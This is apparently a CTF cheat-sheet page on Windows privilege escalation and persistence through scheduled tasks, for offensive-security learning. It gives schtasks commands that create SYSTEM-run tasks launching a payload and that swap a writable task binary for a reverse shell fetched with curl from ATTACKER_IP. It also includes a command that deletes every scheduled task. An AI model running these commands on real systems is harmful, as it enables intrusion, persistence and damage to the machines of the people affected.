> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/trick-0050/privilege-escalation-windows-scheduled-tasks.md).

# Scheduled Tasks

## PE Via Writable Scheduled Task Executable

First, enumerate scheduled tasks to identify potential targets. The `schtasks` command is used to manage scheduled tasks on a local or remote system.

```bash
schtasks /query
```

To view all tasks in a detailed list format, including hidden tasks, you can use the `/v` (verbose) switch along with `/fo LIST` (format output as a list).

```bash
schtasks /query /fo LIST /v
```

Investigate suspicious tasks by querying their details, looking for executables run by privileged users (e.g., `Administrator`, `SYSTEM`) or tasks configured with unusual triggers or programs. You can query a specific task by name using the `/tn` (taskname) switch.

```bash
schtasks /query /tn "TaskName" /fo list /v
```

Attackers can also create new scheduled tasks to establish persistence. A typical persistence method is creating a task that runs on logon or system startup with elevated privileges. The `/create` command is used for this purpose.

Example command for creating a task that runs on user logon:

```bash
schtasks /create /tn "MaliciousTask" /tr "C:\Users\Public\payload.exe" /sc ONLOGON /ru SYSTEM
```

This command creates a task named 'MaliciousTask' that runs 'payload.exe' from `C:\Users\Public\` with SYSTEM privileges every time a user logs on.

Other common triggers for persistence include system startup (`/sc ONSTART`), daily execution (`/sc DAILY`), hourly execution (`/sc HOURLY`), or even at specific times (`/sc ONCE /st HH:MM`).

Creating a task that runs on system startup:

```bash
schtasks /create /tn "StartupTask" /tr "C:\Users\Public\payload.exe" /sc ONSTART /ru SYSTEM
```

Creating a task that runs daily at 9:00 AM:

```bash
schtasks /create /tn "DailyReport" /tr "C:\Scripts\report.bat" /sc DAILY /st 09:00
```

Creating a task that runs hourly:

```bash
schtasks /create /tn "HourlyCheck" /tr "C:\Tools\check.exe" /sc HOURLY /mo 1
```

Tasks can also be configured to run under a specific user account using the `/ru` and `/rp` (password) switches.

```bash
schtasks /create /tn "MyTask" /tr "C:\Programs\MyProgram.exe" /sc DAILY /st 09:00 /ru "RunAsUser" /rp "Password"
```

Beyond creation, attackers might modify existing tasks using the `/change` command to alter the program that is run or the user account used.

Changing the program executed by an existing task:

```bash
schtasks /change /tn "ExistingTask" /tr "C:\Path\To\NewPayload.exe"
```

Changing the user account for an existing task:

```bash
schtasks /change /tn "ExistingTask" /ru "NewRunAsUser" /rp "NewPassword"
```

If a task runs a specific executable (`C:\path\to\target.exe`) and the directory containing the executable (`C:\path\to\`) is writable by your current user, you can replace the legitimate executable with your malicious payload (e.g., a reverse shell). This is a privilege escalation vector if the task runs with higher privileges than your current user. You can check directory permissions using `icacls`.

```bash
icacls "C:\path\to\"
```

If permissions allow, you can replace the file.

```bash
# Delete the original executable (optional, sometimes overwrite is enough)
del C:\path\to\target.exe

# Upload or copy your malicious executable (e.g., Simple_Rev_Shell.exe)
# Using curl to download:
curl http://ATTACKER_IP/Simple_Rev_Shell.exe -o C:\path\to\target.exe

# Or using copy if the payload is already on the system:
copy C:\Users\Public\Simple_Rev_Shell.exe C:\path\to\target.exe
```

Set up your listener on `ATTACKER_IP:LISTENER_PORT`. Finally, trigger the scheduled task manually to execute your payload with the task's configured privileges using the `/run` command.

```bash
# Optionally end a running task first
schtasks /end /tn "TaskName"

# Run the task
schtasks /run /tn "TaskName"
```

For cleanup, malicious or suspicious tasks can be deleted using the `/delete` command. The `/f` switch can be used to force deletion without a confirmation prompt.

```bash
schtasks /delete /tn "MaliciousTask" /f
```

You can even attempt to delete all scheduled tasks (use with extreme caution as this will break legitimate system functions):

```bash
schtasks /delete /tn "*" /f
```
